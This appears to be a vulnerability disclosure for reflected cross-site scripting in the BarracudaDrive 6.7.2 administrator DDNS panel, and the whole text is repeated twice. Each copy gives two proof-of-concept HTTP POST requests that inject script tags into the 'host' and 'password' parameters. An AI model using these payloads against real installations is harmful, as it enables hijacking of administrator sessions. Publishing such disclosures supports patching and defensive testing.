###############################################################################
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Rflected Cross-Site Scripting
#Author : Govind Singh aka NullCool
#Vendor : http://barracudadrive.com
#Software : BarracudaDrive 6.7.2
#Date : 15/06/2014
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina
################################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Overview of vulnerability o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel
Reflected Cross-Site Scripting Vulnerabilities in BarracudaDrive, user input is not properly checked before submission.
1) "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.
2) "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Proof of Concept: o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1).
Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=81
POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E
Poc image : http://prntscr.com/3sym87
2).
Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=78
POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script>
Poc Image : http://prntscr.com/3symgz
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Rflected Cross-Site Scripting
#Author : Govind Singh aka NullCool
#Vendor : http://barracudadrive.com
#Software : BarracudaDrive 6.7.2
#Date : 15/06/2014
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina
################################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Overview of vulnerability o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel
Reflected Cross-Site Scripting Vulnerabilities in BarracudaDrive, user input is not properly checked before submission.
1) "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.
2) "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Proof of Concept: o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1).
Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=81
POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E
Poc image : http://prntscr.com/3sym87
2).
Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=78
POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script>
Poc Image : http://prntscr.com/3symgz
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information